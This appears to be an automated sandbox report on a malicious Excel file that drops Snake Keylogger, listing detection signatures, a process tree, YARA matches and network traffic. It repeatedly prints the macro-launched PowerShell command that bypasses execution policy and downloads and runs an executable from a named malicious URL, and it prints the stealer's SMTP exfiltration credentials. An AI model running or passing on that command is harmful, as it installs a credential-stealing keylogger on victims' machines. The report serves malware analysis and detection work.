Windows Analysis Report
7qsPAygCOx.xlsx

Overview

General Information

Sample name: 7qsPAygCOx.xlsx
renamed because original name is a hash value
Original sample name: b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsx
Analysis ID: 1562381
MD5: 9bf51f7bdf35911324a4fbb9235090f7
SHA1: d1abcb2b543a4c0f308dade69d1be6a96f356a3b
SHA256: b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025
Tags: cia-tf, xlsx, user-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Drops large PE files
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3420 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • powershell.exe (PID: 3532 cmdline: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • tmp7752.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Local\Temp\tmp7752.exe" MD5: 2ED7362E959D42385D4E6D231A6840DD)
  • wscript.exe (PID: 3876 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • svcost.exe (PID: 3928 cmdline: "C:\Users\user\AppData\Roaming\svcost.exe" MD5: A210D6F3E1093395552CE55FA063E011)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14ad5:$a1: get_encryptedPassword
  • 0x14dc1:$a2: get_encryptedUsername
  • 0x148e1:$a3: get_timePasswordChanged
  • 0x149dc:$a4: get_passwordField
  • 0x14aeb:$a5: set_encryptedPassword
  • 0x16168:$a7: get_logins
  • 0x160cb:$a10: KeyLoggerEventArgs
  • 0x15d36:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x18498:$x1: $%SMTPDV$
  • 0x184fe:$x2: $#TheHashHere%&
  • 0x19b0f:$x3: %FTPDV$
  • 0x19c03:$x4: $%TelegramDv$
  • 0x15d36:$x5: KeyLoggerEventArgs
  • 0x160cb:$x5: KeyLoggerEventArgs
  • 0x19b33:$m2: Clipboard Logs ID
  • 0x19d53:$m2: Screenshot Logs ID
  • 0x19e63:$m2: keystroke Logs ID
  • 0x1a13d:$m3: SnakePW
  • 0x19d2b:$m4: \SnakeKeylogger\
00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
Source | Rule | Description | Author | Strings
5.2.tmp7752.exe.4a80000.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.tmp7752.exe.3825570.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.tmp7752.exe.3825570.5.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
5.2.tmp7752.exe.3825570.5.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x12c85:$a1: get_encryptedPassword
  • 0x12f71:$a2: get_encryptedUsername
  • 0x12a91:$a3: get_timePasswordChanged
  • 0x12b8c:$a4: get_passwordField
  • 0x12c9b:$a5: set_encryptedPassword
  • 0x14318:$a7: get_logins
  • 0x1427b:$a10: KeyLoggerEventArgs
  • 0x13ee6:$a11: KeyLoggerEventArgsEventHandler
5.2.tmp7752.exe.3825570.5.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1a6af:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x198e1:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19d14:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1ad53:$a5: \Kometa\User Data\Default\Login Data

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3876, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3876, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Users\user\AppData\Local\Temp\lvmpns14.xqn.ps1

              Data Obfuscation

              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tmp7752.exe, ProcessId: 3756, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
              No Suricata rule has matched

              AV Detection

              Source: 7qsPAygCOx.xlsx | Avira: detected
              Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe | Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Avira: detection malicious, Label: HEUR/AGEN.1310409
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | ReversingLabs: Detection: 68%
              Source: 7qsPAygCOx.xlsx | ReversingLabs: Detection: 47%
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Joe Sandbox ML: detected
              Source: 7qsPAygCOx.xlsx | Joe Sandbox ML: detected
              Source: unknown | HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
              Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\

              Software Vulnerabilities

              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00460D90h | 5_2_00460CD8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00640944h | 5_2_006408A8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00640944h | 5_2_00640AFE
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00640944h | 5_2_00640C56
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00AAB60Bh | 5_2_00AAB401
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then jmp 00AAB60Bh | 5_2_00AAB410
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 5_2_04A7DB88
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 00690944h | 8_2_006908A8
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 00690944h | 8_2_00690898
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 00690944h | 8_2_00690C56
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 0069F5D0h | 8_2_0069F518
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 0212B60Bh | 8_2_0212B410
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then jmp 0212B60Bh | 8_2_0212B401
              Source: C:\Users\user\AppData\Roaming\svcost.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 8_2_044BDB88
              Source: global traffic | DNS query: name: cia.tf
              Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global traffic TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
